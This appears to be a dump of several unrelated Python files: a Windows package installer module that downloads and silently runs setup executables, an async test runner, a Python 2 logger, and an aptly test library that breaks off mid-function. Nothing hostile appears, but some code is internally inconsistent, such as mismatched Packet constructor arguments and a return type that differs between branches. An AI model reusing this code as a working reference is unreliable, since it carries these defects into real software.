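#   python flickr_grab.py --download    # download images for every ./search/search.*.json result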
|
ThreadedInstaller.py
|
######################################################################
# PACKAGE MANAGER #
######################################################################
from logger import log_info, close_log
from Classes.Download import Download
from Classes.Install import Install
from Classes.Packet import Packet
from extension import write, write_debug, write_verbose
from colorama import Fore
import tempfile
import click
import sys
import os
import utils
from zip_utils import set_environment_variable, confirm
paths = {}
class ThreadedInstaller:
def __init__(self, packets, metadata):
self.packets = packets
self.metadata = metadata
def download(self, download: Download):
import cursor
import requests
cursor.hide()
if not os.path.isdir(Rf'{tempfile.gettempdir()}\electric'):
os.mkdir(Rf'{tempfile.gettempdir()}\electric')
path = Rf'{tempfile.gettempdir()}\electric\{download.name}{download.extension}'
with open(path, 'wb') as f:
response = requests.get(download.url, stream=True)
total_length = response.headers.get('content-length')
if total_length is None:
f.write(response.content)
else:
dl = 0
full_length = int(total_length)
for data in response.iter_content(chunk_size=4096):
dl += len(data)
f.write(data)
if not self.metadata.no_progress and not self.metadata.silent:
complete = int(20 * dl / full_length)
fill_c, unfill_c = '█' * \
complete, ' ' * (20 - complete)
try:
sys.stdout.write(
f"\r({fill_c}{unfill_c}) {round(dl / full_length * 100)} % ")
except UnicodeEncodeError:
pass
sys.stdout.flush()
paths.update({
download.display_name:
{
'path': path,
'display_name': download.display_name
}
})
        sys.stdout.write('\n')
def install_package(self, install: Install) -> str:
path = install.path
switches = install.install_switches
download_type = install.download_type
custom_install_switch = install.custom_install_switch
directory = install.directory
if download_type == '.exe':
if '.exe' not in path:
if not os.path.isfile(path + '.exe'):
os.rename(path, f'{path}.exe')
path = path + '.exe'
command = path + ' '
for switch in switches:
command = command + ' ' + switch
if custom_install_switch and directory:
if '/D=' in custom_install_switch:
command += ' ' + custom_install_switch + f'{directory}'
else:
command += ' ' + custom_install_switch + f'"{directory}"'
if custom_install_switch == 'None' and install.directory:
click.echo(click.style(
f'Installing {install.display_name} To Default Location, Custom Installation Directory Not Supported By This Installer!', fg='bright_yellow'))
utils.run_cmd(command.replace('<version>', install.version),
self.metadata, 'installation', install)
elif download_type == '.msi':
            command = 'msiexec.exe /i ' + path + ' '
for switch in switches:
command = command + ' ' + switch
if custom_install_switch and directory != '' and directory != None:
command = command + ' ' + \
custom_install_switch + rf'"{directory}"'
utils.run_cmd(command.replace('<version>', install.version),
self.metadata, 'installation', install)
def calculate_spwn(self, number: int) -> str:
if number <= 3:
return 'threading'
return 'processing'
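    # Illustrative behaviour of calculate_spwn: three or fewer downloads are run
    # on threads, larger batches fall back to separate processes.
    #   calculate_spwn(2) -> 'threading'
    #   calculate_spwn(6) -> 'processing'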
def handle_dependencies(self):
for packet in self.packets:
if packet.dependencies:
ThreadedInstaller.install_dependent_packages(
packet, self.metadata.rate_limit, packet.directory, self.metadata)
def handle_multi_download(self) -> list:
from threading import Thread
self.handle_dependencies()
metadata = self.metadata
package_list = [packet.display_name for packet in self.packets]
package_list = str(package_list).replace(
'[', '').replace(']', '').replace('\'', '')
if not metadata.no_color:
write(
f'SuperCached [ {Fore.LIGHTCYAN_EX}{package_list}{Fore.RESET} ]', 'white', metadata)
else:
write(
f'SuperCached [ {package_list} ]', 'white', metadata)
log_info('Initializing Rapid Download', metadata.logfile)
packets = self.packets
download_items = []
if len(packets) > 1:
for idx, packet in enumerate(packets):
download_items.append(Download(packet.win64, packet.win64_type,
f'Setup{idx}', packet.display_name, f"{tempfile.gettempdir()}\\electric\\Setup{idx}{packet.win64_type}"))
elif len(packets) == 1:
download_items.append(Download(packets[0].win64, packets[0].win64_type, 'Setup0',
packets[0].display_name, f"{tempfile.gettempdir()}\\electric\\Setup0{packets[0].win64_type}"))
for item in download_items:
write_verbose(
f'Sending request to {item.url} for downloading {item.display_name}', self.metadata)
write_debug(
f'Downloading {item.display_name} from {item.url} into {item.name}{item.extension}', self.metadata)
method = self.calculate_spwn(len(packets))
if method == 'threading':
threads = [
Thread(target=self.download, args=(item,))
for item in download_items
]
for thread in threads:
thread.start()
for x in threads:
x.join()
if method == 'processing':
from multiprocessing import Process
processes = [Process(
target=self.download, args=(item,)) for item in download_items]
for process in processes:
process.start()
for x in processes:
x.join()
for item in download_items:
if self.metadata.virus_check:
write(
f'\nScanning {item.display_name} For Viruses...', 'bright_cyan', metadata)
utils.check_virus(item.path, metadata, None)
write_debug(
f'Rapid Download Successfully Downloaded {len(download_items)} Packages Using RapidThreading', metadata, newline=True)
write_debug('Rapid Download Exiting With Code 0', metadata)
if not self.metadata.debug:
write('\nSuccessfully Downloaded Installation Files',
'bright_green', metadata)
else:
write('Successfully Downloaded Installation Files',
'bright_green', metadata)
log_info('Finished Rapid Download', metadata.logfile)
write_verbose('Running Installers Using Multi-Threading', metadata)
write(
'Installing Packages', 'cyan', metadata)
log_info(
            'Using Rapid Install To Complete Setup, Accept Prompts Asking For Admin Permission...', metadata.logfile)
return paths
def generate_installers(self, paths) -> list:
install_items = []
packets = self.packets
install_items = []
if len(packets) > 1:
for pack in packets:
for path in paths.items():
if pack.display_name == path[1]['display_name']:
install_items.append(
Install(
pack.json_name,
pack.display_name, path[1]['path'], pack.install_switches, pack.win64_type, pack.directory, pack.custom_location, pack.install_exit_codes, pack.uninstall_exit_codes, self.metadata, pack.version))
else:
            return Install(packets[0].json_name, packets[0].display_name, list(paths.values())[0]['path'], packets[0].install_switches, packets[0].win64_type, packets[0].directory, packets[0].custom_location, packets[0].install_exit_codes, packets[0].uninstall_exit_codes, self.metadata, packets[0].version)
return self.generate_split(install_items)
def generate_split(self, install_items) -> list:
exe_list = []
msi_list = []
other_list = []
for item in install_items:
if item.download_type == '.exe':
exe_list.append(item)
elif item.download_type == '.msi':
msi_list.append(item)
else:
other_list.append(item)
install_items = [{'exe': exe_list}, {
'msi': msi_list}, {'other': other_list}]
return install_items
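    # Shape of the value returned by generate_split (illustrative):
    #   [{'exe': [<Install>, ...]}, {'msi': [<Install>, ...]}, {'other': [<Install>, ...]}]
    # MSI installers are later run sequentially, while exe/other installers are
    # dispatched to separate processes in handle_multi_install.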
def handle_multi_install(self, paths):
from time import strftime
write_debug('Initialising Rapid Install Procedure...', self.metadata)
processes = []
install_items = self.generate_installers(paths)
idx = 0
for item in install_items:
if 'msi' in list(item.keys()):
for val in item['msi']:
self.install_package(val)
continue
else:
from multiprocessing import Process
string = ''
string = 'other' if 'other' in list(item.keys()) else 'exe'
for val in item[string]:
write_debug(
f'Running Installer For <{val.display_name}> On Thread {item[string].index(val)}', self.metadata)
processes.append(
Process(
target=self.install_package, args=(val,))
)
for process in processes:
process.start()
for x in processes:
x.join()
processes.clear()
idx += 1
if self.metadata.reduce_package:
for path in paths:
os.remove(path)
write('Successfully Cleaned Up Installer From Temp Directory...',
'bright_green', self.metadata)
for packet in self.packets:
metadata = self.metadata
if packet.add_path:
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
write(
f'Appending "{packet.add_path.replace("<install-directory>", replace_install_dir)}" To PATH', 'bright_green', metadata)
write_verbose(
f'Appending "{packet.add_path.replace("<install-directory>", replace_install_dir)}" To PATH', metadata)
log_info(
f'Appending "{packet.add_path.replace("<install-directory>", replace_install_dir)}" To PATH', metadata.logfile)
utils.append_to_path(packet.add_path.replace(
'<install-directory>', replace_install_dir))
if packet.set_env:
if isinstance(packet.set_env, list):
for obj in packet.set_env:
name = obj['name']
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
write(
f'Setting Environment Variable {name}', 'bright_green', metadata)
write_verbose(
f'Setting Environment Variable {name} to {obj["value"].replace("<install-directory>", replace_install_dir)}', metadata)
log_info(
f'Setting Environment Variable {name} to {obj["value"].replace("<install-directory>", replace_install_dir)}', metadata.logfile)
set_environment_variable(
name, obj['value'].replace('<install-directory>', replace_install_dir))
else:
name = packet.set_env['name']
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
write(
f'Setting Environment Variable {name}', 'bright_green', metadata)
write_verbose(
f'Setting Environment Variable {name} to {packet.set_env["value"].replace("<install-directory>", replace_install_dir)}', metadata)
log_info(
f'Setting Environment Variable {name} to {packet.set_env["value"].replace("<install-directory>", replace_install_dir)}', metadata.logfile)
set_environment_variable(
name, packet.set_env['value'].replace('<install-directory>', replace_install_dir))
if packet.shim:
for shim in packet.shim:
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
shim = shim.replace(
'<install-directory>', replace_install_dir).replace('<version>', packet.version)
shim_name = shim.split(
"\\")[-1].split('.')[0].replace('<version>', packet.version)
write(
f'Generating Shim For {shim_name}', 'cyan', metadata)
utils.generate_shim(
shim, shim_name, shim.split('.')[-1])
utils.register_package_success(
packet, packet.directory, self.metadata)
write('The PATH environment variable has changed. Run `refreshenv` to refresh your environment variables.', 'green', self.metadata)
write(
'Successfully Installed Packages!', 'bright_magenta', self.metadata)
log_info('Successfully Installed Packages!', self.metadata.logfile)
log_info('Refreshing Environment Variables', self.metadata.logfile)
write_debug(
'Refreshing Env Variables, Calling Batch Script', self.metadata)
write_verbose('Refreshing Environment Variables', self.metadata)
write_debug(
f'Successfully Refreshed Environment Variables', self.metadata)
write_verbose('Installation and setup completed.', self.metadata)
log_info('Installation and setup completed.', self.metadata.logfile)
write_debug(
f'Terminated debugger at {strftime("%H:%M:%S")} on install::completion', self.metadata)
log_info(
f'Terminated debugger at {strftime("%H:%M:%S")} on install::completion', self.metadata.logfile)
if self.metadata.logfile:
close_log(self.metadata.logfile, 'Install')
@staticmethod
def install_dependent_packages(packet: Packet, rate_limit: int, install_directory: str, metadata):
from limit import Limiter, TokenBucket
from registry import get_environment_keys
disp = str(packet.dependencies).replace(
"[", "").replace("]", "").replace("\'", "")
write(f'{packet.display_name} has the following dependencies: {disp}',
'bright_yellow', metadata)
continue_install = confirm(
'Would you like to install the above dependencies ?')
if continue_install:
write(
f'Installing Dependencies For => {packet.display_name}', 'cyan', metadata)
if len(packet.dependencies) > 1 and len(packet.dependencies) <= 5:
write(
f'Using Parallel Installation For Installing Dependencies', 'bright_green', metadata)
packets = []
for package in packet.dependencies:
res = utils.send_req_package(package)
pkg = res
keys = list(pkg.keys())
idx = 0
for key in keys:
if key not in ['package-name', 'nightly', 'display-name']:
idx = keys.index(key)
break
version = keys[idx]
pkg = pkg[version]
custom_dir = None
if install_directory:
custom_dir = install_directory + \
f'\\{pkg["package-name"]}'
else:
custom_dir = install_directory
install_exit_codes = None
if 'valid-install-exit-codes' in list(pkg.keys()):
install_exit_codes = pkg['valid-install-exit-codes']
packet = Packet(
package,
res['package-name'],
pkg['url'],
pkg['file-type'],
pkg['clswitch'],
pkg['iswitches'],
pkg['uswitches'],
custom_dir,
pkg['dependencies'],
install_exit_codes,
None,
pkg['set-env'] if 'set-env' in list(
pkg.keys()) else None,
pkg['default-install-dir'] if 'default-install-dir' in list(
pkg.keys()) else None,
pkg['uninstall'] if 'uninstall' in list(
pkg.keys()) else [],
pkg['add-path'] if 'add-path' in list(
pkg.keys()) else None,
pkg['checksum'] if 'checksum' in list(
pkg.keys()) else None,
pkg['bin'] if 'bin' in list(pkg.keys()) else None,
pkg['pre-update'] if 'pre-update' in list(
pkg.keys()) else None,
)
installation = utils.find_existing_installation(
package, packet.json_name)
if installation:
write_debug(
f'Aborting Installation As {packet.json_name} is already installed.', metadata)
write_verbose(
f'Found an existing installation of => {packet.json_name}', metadata)
write(
f'Found an existing installation {packet.json_name}.', 'bright_yellow', metadata)
write_verbose(
f'Package to be installed: {packet.json_name}', metadata)
log_info(
f'Package to be installed: {packet.json_name}', metadata.logfile)
write_verbose(
f'Finding closest match to {packet.json_name}...', metadata)
log_info(
f'Finding closest match to {packet.json_name}...', metadata.logfile)
packets.append(packet)
write_verbose(
'Generating system download path...', metadata)
log_info('Generating system download path...',
metadata.logfile)
manager = ThreadedInstaller(packets, metadata)
paths = manager.handle_multi_download()
log_info('Finished Rapid Download...', metadata.logfile)
log_info(
'Using Rapid Install To Complete Setup, Accept Prompts Asking For Admin Permission...', metadata.logfile)
manager.handle_multi_install(paths)
return
else:
write('Starting Sync Installation', 'bright_green', metadata)
for package in packet.dependencies:
res = utils.send_req_package(package)
write(
f'SuperCached [ {Fore.LIGHTCYAN_EX}{res["display-name"]}{Fore.RESET} ]', 'white', metadata)
pkg = res[res['latest-version']]
log_info(
'Generating Packet For Further Installation.', metadata.logfile)
install_exit_codes = None
if 'valid-install-exit-codes' in list(pkg.keys()):
install_exit_codes = pkg['valid-install-exit-codes']
packet = Packet(
res,
res['package-name'],
res['display-name'],
pkg['url'],
pkg['file-type'],
pkg['clswitch'],
pkg['iswitches'],
pkg['uswitches'],
install_directory,
pkg['dependencies'],
install_exit_codes,
[],
None,
False,
pkg['set-env'] if 'set-env' in list(
pkg.keys()) else None,
pkg['default-install-dir'] if 'default-install-dir' in list(
pkg.keys()) else None,
pkg['uninstall'] if 'uninstall' in list(
pkg.keys()) else [],
pkg['add-path'] if 'add-path' in list(
pkg.keys()) else None,
pkg['checksum'] if 'checksum' in list(
pkg.keys()) else None,
pkg['bin'] if 'bin' in list(pkg.keys()) else None,
pkg['pre-update'] if 'pre-update' in list(
pkg.keys()) else None,
)
log_info(
'Searching for existing installation of package.', metadata.logfile)
installation = utils.find_existing_installation(
package, packet.json_name)
if installation:
write_debug(
f'Found existing installation of {packet.json_name}.', metadata)
write_verbose(
f'Found an existing installation of => {packet.json_name}', metadata)
write(
f'Found an existing installation {packet.json_name}.', 'bright_yellow', metadata)
continue
if packet.dependencies:
ThreadedInstaller.install_dependent_packages(
packet, rate_limit, install_directory, metadata)
write_verbose(
f'Package to be installed: {packet.json_name}', metadata)
log_info(
f'Package to be installed: {packet.json_name}', metadata.logfile)
write_verbose(
'Generating system download path...', metadata)
log_info('Generating system download path...',
metadata.logfile)
download_url = packet.win64
log_info('Initializing Rapid Download...',
metadata.logfile)
# Downloading The File From Source
write_debug(
f'Downloading {packet.display_name} from => {packet.win64}', metadata)
write_verbose(
f"Downloading from '{download_url}'", metadata)
log_info(
f"Downloading from '{download_url}'", metadata.logfile)
if rate_limit == -1:
path = utils.download(
download_url, packet.json_name, metadata, packet.win64_type)
else:
log_info(
f'Starting rate-limited installation => {rate_limit}', metadata.logfile)
bucket = TokenBucket(
tokens=10 * rate_limit, fill_rate=rate_limit)
limiter = Limiter(
bucket=bucket,
filename=f'{tempfile.gettempdir()}\Setup{packet.win64_type}',
)
from urllib.request import urlretrieve
urlretrieve(
url=download_url,
filename=f'{tempfile.gettempdir()}\Setup{packet.win64_type}',
reporthook=limiter
)
path = f'{tempfile.gettempdir()}\Setup{packet.win64_type}'
log_info('Finished Rapid Download', metadata.logfile)
if metadata.virus_check:
write('Scanning File For Viruses...',
'bright_cyan', metadata)
utils.check_virus(path, metadata)
write(
f'Installing {packet.display_name}', 'cyan', metadata)
log_info(
'Using Rapid Install To Complete Setup, Accept Prompts Asking For Admin Permission...', metadata.logfile)
write_verbose('Creating registry start snapshot', metadata)
log_info('Creating start snapshot of registry...',
metadata.logfile)
start_snap = get_environment_keys()
write_debug(
f'Installing {packet.json_name} through Setup{packet.win64_type}', metadata)
log_info(
f'Installing {packet.json_name} through Setup{packet.win64_type}', metadata.logfile)
# Running The Installer silently And Completing Setup
utils.install_package(path, packet, metadata)
changes_environment = False
if packet.shim:
changes_environment = True
for shim in packet.shim:
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
shim = shim.replace(
'<install-directory>', replace_install_dir).replace('<version>', packet.version)
shim_name = shim.split(
"\\")[-1].split('.')[0].replace('<version>', packet.version)
write(
f'Generating Shim For {shim_name}', 'cyan', metadata)
utils.generate_shim(
shim, shim_name, shim.split('.')[-1])
if packet.add_path:
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
write(
f'Appending "{packet.add_path.replace("<install-directory>", replace_install_dir)}" To PATH', 'bright_green', metadata)
utils.append_to_path(packet.add_path.replace(
'<install-directory>', replace_install_dir))
if packet.set_env:
if isinstance(packet.set_env, list):
for obj in packet.set_env:
name = obj['name']
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
write(
f'Setting Environment Variable {name}', 'bright_green', metadata)
write_verbose(
f'Setting Environment Variable {name} to {obj["value"].replace("<install-directory>", replace_install_dir)}', metadata)
log_info(
f'Setting Environment Variable {name} to {obj["value"].replace("<install-directory>", replace_install_dir)}', metadata.logfile)
set_environment_variable(
name, obj['value'].replace('<install-directory>', replace_install_dir))
else:
name = packet.set_env['name']
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
write(
f'Setting Environment Variable {name}', 'bright_green', metadata)
write_verbose(
f'Setting Environment Variable {name} to {packet.set_env["value"].replace("<install-directory>", replace_install_dir)}', metadata)
log_info(
f'Setting Environment Variable {name} to {packet.set_env["value"].replace("<install-directory>", replace_install_dir)}', metadata.logfile)
set_environment_variable(
name, packet.set_env['value'].replace('<install-directory>', replace_install_dir))
write_verbose(
'Creating Final Snapshot Of Environment Keys', metadata)
final_snap = get_environment_keys()
if final_snap.env_length > start_snap.env_length or final_snap.sys_length > start_snap.sys_length or changes_environment:
write('The PATH environment variable has changed. Run `refreshenv` to refresh your environment variables.',
'bright_green', metadata)
write_verbose(
'Successfully Verified Installation Of Packages', metadata)
write(
f'Successfully Installed {packet.display_name}', 'bright_magenta', metadata)
log_info(
f'Successfully Installed {packet.display_name}', metadata.logfile)
utils.register_package_success(
packet, install_directory, metadata)
if metadata.reduce_package:
os.remove(path)
try:
os.remove(
Rf'{tempfile.gettempdir()}\downloadcache.pickle')
except:
pass
log_info(
'Successfully Cleaned Up Installer From Temporary Directory And DownloadCache', metadata.logfile)
write('Successfully Cleaned Up Installer From Temp Directory...',
'bright_green', metadata)
write_verbose(
'Dependency successfully Installed.', metadata)
log_info('Dependency successfully Installed.',
metadata.logfile)
else:
os._exit(1)
|
tester.py
|
import asyncio
import time
from threading import Thread
class Test:
def __init__(self, func, ignored_exception, *args):
self.func = func
self.value = args
self.ignored_exception = ignored_exception
self.completed = None
self.time = 0
self.result = None
self.exception = None
async def run(self):
start = time.time()
try:
self.result = await self.func()
except Exception as e:
self.exception = e.__class__.__name__ + ": " + str(e)
if self.ignored_exception and isinstance(e, self.ignored_exception):
self.exception = None
self.time = (time.time() - start) * 1000
self.completed = (
any(self.result == val for val in self.value) and not self.exception
)
class Tester:
def __init__(self, gather: bool = True):
self.tests = []
self.gather = gather
self._thread = Thread(target=self._handle_ui)
def _handle_ui(self):
done_tests = []
while True:
done = True
for test in self.tests:
if test in done_tests:
continue
flush = False
if test.completed:
status_string = f"✅ Passed. {test.time}ms"
elif test.completed is None:
flush = True
done = False
status_string = "🕒 Running.."
else:
status_string = f"❌ Failed. {test.time}ms"
if flush:
print(
f"\rRunning test '{test.func.__name__}' - {status_string}",
end="",
flush=True,
)
else:
done_tests.append(test)
print(f"\rRunning test '{test.func.__name__}' - {status_string}")
if done:
break
time.sleep(0.05)
failed = [x for x in self.tests if not x.completed]
failed_str = "\n".join(
[
f"Test '{x.func.__name__}' failed, "
+ (
f"{x.exception} was raised."
if x.exception
else f"expected {x.value}, got {x.result}."
)
for x in failed
]
)
print(
f"---------------\nDone, ({len(self.tests) - len(failed)}/{len(self.tests)}) tests have passed.\n"
+ failed_str
)
def add_test(self, function, *args, ignored_exception=None):
self.tests.append(Test(function, ignored_exception, *args))
async def run(self):
print(f"Running {len(self.tests)} test(s).\n---------------")
self._thread.start()
if self.gather:
await asyncio.gather(*[x.run() for x in self.tests])
return
for x in self.tests:
await x.run()
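if __name__ == "__main__":
    # Minimal usage sketch (illustrative; the coroutine below is a hypothetical
    # example and not part of this module): register async callables with their
    # expected return values, then run the tester to print pass/fail results.
    async def returns_42():
        await asyncio.sleep(0.01)
        return 42

    example = Tester(gather=True)
    example.add_test(returns_42, 42)
    asyncio.run(example.run())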
|
log.py
|
# coding=utf8
from datetime import datetime
from Queue import Queue, Empty
from threading import Thread, Lock
from threading import Event as TEvent
import hashlib
import sys,traceback, re
_logger = None
def sstr(obj):
""" converts any object to str, if necessary encodes unicode chars """
try:
return str(obj)
except UnicodeEncodeError:
return unicode(obj).encode('utf-8')
class Logtype(object):
DEBUG = 1
INFO = 2
WARNING = 3
ERROR = 4
NONE = 99
class CColors(object):
DEBUG = '\033[92m'
INFO = '\033[92m'
WARNING = '\033[93m'
ERROR = '\033[91m'
ENDC = '\033[0m'
class Loggable(object):
"""Inherit and set log_id to have a log function in any class"""
def __init__(self):
self.log_id = "anonymous"
def log(self, msg, logtype = Logtype.NONE):
Logger.log(self.log_id, msg, logtype)
def log_exception(self, msg="Exception occured.", logtype = Logtype.ERROR, exc_info=None):
Logger.log_exception(self.log_id, msg, logtype, exc_info)
class Logger(object):
"""Asynchronous logger that prints to command line"""
def __init__(self, verbose=True):
self.verbose = verbose
self.pending_messages = Queue()
self._stop = TEvent()
self.sendercolors = dict()
self.worker_thread = Thread(target=self.work,name = "Logging thread")
self.last_date = datetime.now().strftime('%Y-%m-%d')
self.printlock = Lock()
@staticmethod
def start(verbose=True):
global _logger
_logger = Logger(verbose)
_logger.worker_thread.start()
@staticmethod
def log(senderid,msg,logtype=Logtype.NONE):
global _logger
if _logger == None:
raise(RuntimeError("Logger is not initialized"))
if _logger.verbose or (logtype != Logtype.NONE and logtype != Logtype.DEBUG):
_logger.pending_messages.put((sstr(senderid),sstr(msg),logtype))
@staticmethod
def log_exception(senderid,msg="Exception occured.",logtype=Logtype.ERROR,exc_info=None):
global _logger
if _logger == None:
raise(RuntimeError("Logger is not initialized"))
if exc_info == None:
exc_type, exc_value, exc_traceback = sys.exc_info()
else:
exc_type, exc_value, exc_traceback = exc_info
estr = ""
if _logger.verbose:
estr = estr.join(traceback.format_exception(exc_type, exc_value, exc_traceback))
else:
estr = estr.join(traceback.format_exception_only(exc_type, exc_value))
_logger.pending_messages.put((sstr(senderid),sstr(msg) + "\n" + sstr(estr),logtype))
@staticmethod
def stop():
global _logger
if _logger == None:
raise(RuntimeError("Logger is not initialized"))
_logger._stop.set()
@staticmethod
def get_thread():
global _logger
return _logger.worker_thread
@staticmethod
def get_printlock():
return _logger.printlock
@staticmethod
def get_pending_messages():
return _logger.pending_messages
def printmsg(self,senderid,msg,logtype=Logtype.NONE):
current_date = datetime.now().strftime('%Y-%m-%d')
if current_date != self.last_date:
print ("--- " + current_date + " ---")
self.last_date = current_date
timestr = datetime.now().strftime('%H:%M:%S')
if (logtype == Logtype.DEBUG):
timestr = CColors.DEBUG + timestr + CColors.ENDC
elif (logtype == Logtype.INFO):
timestr = CColors.INFO + timestr + CColors.ENDC
elif (logtype == Logtype.WARNING):
timestr = CColors.WARNING + timestr + CColors.ENDC
elif (logtype == Logtype.ERROR):
timestr = CColors.ERROR + timestr + CColors.ENDC
if not(senderid in self.sendercolors):
m = hashlib.md5()
m.update(senderid)
colornum = (int(m.hexdigest()[:1],16) % 6) + 4
self.sendercolors[senderid] = '\033[9' + str(colornum) + 'm'
short_senderid = senderid.rpartition("__")[2]
header = timestr + " [" + self.sendercolors[senderid] + short_senderid + CColors.ENDC + "] "
body = re.sub(r'\n', "\n" + ''.join([" " for x in range(9)]),msg)
print (header + body)
def work(self):
while not self.pending_messages.empty() or not self._stop.is_set():
if self.printlock.acquire(False):
try:
senderid, msg, logtype = self.pending_messages.get(block=True, timeout = 1)
self.printmsg(senderid,msg,logtype)
self.pending_messages.task_done()
except Empty:
pass
finally:
self.printlock.release()
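if __name__ == "__main__":
    # Minimal usage sketch (illustrative, not part of the original module):
    # start the asynchronous logger, emit a few messages, then shut it down.
    Logger.start(verbose=True)
    Logger.log("example__worker", "hello from the logger", Logtype.INFO)
    try:
        raise ValueError("demo failure")
    except ValueError:
        Logger.log_exception("example__worker", "Caught a demo exception.")
    Logger.stop()
    Logger.get_thread().join()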
|
lib.py
|
"""
Test library.
"""
import difflib
import inspect
import json
import subprocess
import os
import posixpath
import shlex
import shutil
import string
import threading
import urllib
#import time
import pprint
import SocketServer
import SimpleHTTPServer
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
class FileHTTPServerRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
"""Translate a /-separated PATH to the local filename syntax.
Components that mean special things to the local file system
(e.g. drive or directory names) are ignored. (XXX They should
probably be diagnosed.)
"""
# abandon query parameters
path = path.split('?', 1)[0]
path = path.split('#', 1)[0]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = self.rootPath
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in (os.curdir, os.pardir):
continue
path = os.path.join(path, word)
return path
def log_message(self, format, *args):
pass
class BaseTest(object):
"""
Base class for all tests.
"""
longTest = False
fixturePool = False
fixturePoolCopy = False
fixtureDB = False
fixtureGpg = False
fixtureWebServer = False
expectedCode = 0
configFile = {
"rootDir": "%s/.aptly" % os.environ["HOME"],
"downloadConcurrency": 4,
"downloadSpeedLimit": 0,
"architectures": [],
"dependencyFollowSuggests": False,
"dependencyFollowRecommends": False,
"dependencyFollowAllVariants": False,
"dependencyFollowSource": False,
"gpgDisableVerify": False,
"gpgDisableSign": False,
"ppaDistributorID": "ubuntu",
"ppaCodename": "",
}
configOverride = {}
environmentOverride = {}
fixtureDBDir = os.path.join(os.environ["HOME"], "aptly-fixture-db")
fixturePoolDir = os.path.join(os.environ["HOME"], "aptly-fixture-pool")
outputMatchPrepare = None
captureResults = False
def test(self):
self.prepare()
self.run()
self.check()
def prepare_remove_all(self):
if os.path.exists(os.path.join(os.environ["HOME"], ".aptly")):
shutil.rmtree(os.path.join(os.environ["HOME"], ".aptly"))
if os.path.exists(os.path.join(os.environ["HOME"], ".aptly.conf")):
os.remove(os.path.join(os.environ["HOME"], ".aptly.conf"))
if os.path.exists(os.path.join(os.environ["HOME"], ".gnupg", "aptlytest.gpg")):
os.remove(os.path.join(os.environ["HOME"], ".gnupg", "aptlytest.gpg"))
def prepare_default_config(self):
cfg = self.configFile.copy()
cfg.update(**self.configOverride)
f = open(os.path.join(os.environ["HOME"], ".aptly.conf"), "w")
f.write(json.dumps(cfg))
f.close()
def fixture_available(self):
if self.fixturePool and not os.path.exists(self.fixturePoolDir):
return False
if self.fixtureDB and not os.path.exists(self.fixtureDBDir):
return False
return True
def prepare_fixture(self):
if self.fixturePool:
#start = time.time()
os.makedirs(os.path.join(os.environ["HOME"], ".aptly"), 0755)
os.symlink(self.fixturePoolDir, os.path.join(os.environ["HOME"], ".aptly", "pool"))
#print "FIXTURE POOL: %.2f" % (time.time()-start)
if self.fixturePoolCopy:
os.makedirs(os.path.join(os.environ["HOME"], ".aptly"), 0755)
shutil.copytree(self.fixturePoolDir, os.path.join(os.environ["HOME"], ".aptly", "pool"), ignore=shutil.ignore_patterns(".git"))
if self.fixtureDB:
#start = time.time()
shutil.copytree(self.fixtureDBDir, os.path.join(os.environ["HOME"], ".aptly", "db"))
#print "FIXTURE DB: %.2f" % (time.time()-start)
if self.fixtureWebServer:
self.webServerUrl = self.start_webserver(os.path.join(os.path.dirname(inspect.getsourcefile(self.__class__)),
self.fixtureWebServer))
if self.fixtureGpg:
self.run_cmd(["gpg", "--no-default-keyring", "--trust-model", "always", "--batch", "--keyring", "aptlytest.gpg", "--import",
os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files", "debian-archive-keyring.gpg"),
os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files", "launchpad.key"),
os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files", "flat.key"),
os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files", "jenkins.key")])
if hasattr(self, "fixtureCmds"):
for cmd in self.fixtureCmds:
self.run_cmd(cmd)
def run(self):
self.output = self.output_processor(self.run_cmd(self.runCmd, self.expectedCode))
def _start_process(self, command, stderr=subprocess.STDOUT, stdout=None):
if not hasattr(command, "__iter__"):
params = {
'files': os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files"),
'udebs': os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "udebs"),
'testfiles': os.path.join(os.path.dirname(inspect.getsourcefile(self.__class__)), self.__class__.__name__),
'aptlyroot': os.path.join(os.environ["HOME"], ".aptly"),
}
if self.fixtureWebServer:
params['url'] = self.webServerUrl
command = string.Template(command).substitute(params)
command = shlex.split(command)
environ = os.environ.copy()
environ["LC_ALL"] = "C"
environ.update(self.environmentOverride)
return subprocess.Popen(command, stderr=stderr, stdout=stdout, env=environ)
def run_cmd(self, command, expected_code=0):
try:
#start = time.time()
proc = self._start_process(command, stdout=subprocess.PIPE)
output, _ = proc.communicate()
#print "CMD %s: %.2f" % (" ".join(command), time.time()-start)
if proc.returncode != expected_code:
raise Exception("exit code %d != %d (output: %s)" % (proc.returncode, expected_code, output))
return output
except Exception, e:
raise Exception("Running command %s failed: %s" % (command, str(e)))
def gold_processor(self, gold):
return gold
def output_processor(self, output):
return output
def expand_environ(self, gold):
return string.Template(gold).substitute(os.environ)
def get_gold_filename(self, gold_name="gold"):
return os.path.join(os.path.dirname(inspect.getsourcefile(self.__class__)), self.__class__.__name__ + "_" + gold_name)
def get_gold(self, gold_name="gold"):
return self.gold_processor(open(self.get_gold_filename(gold_name), "r").read())
def check_output(self):
try:
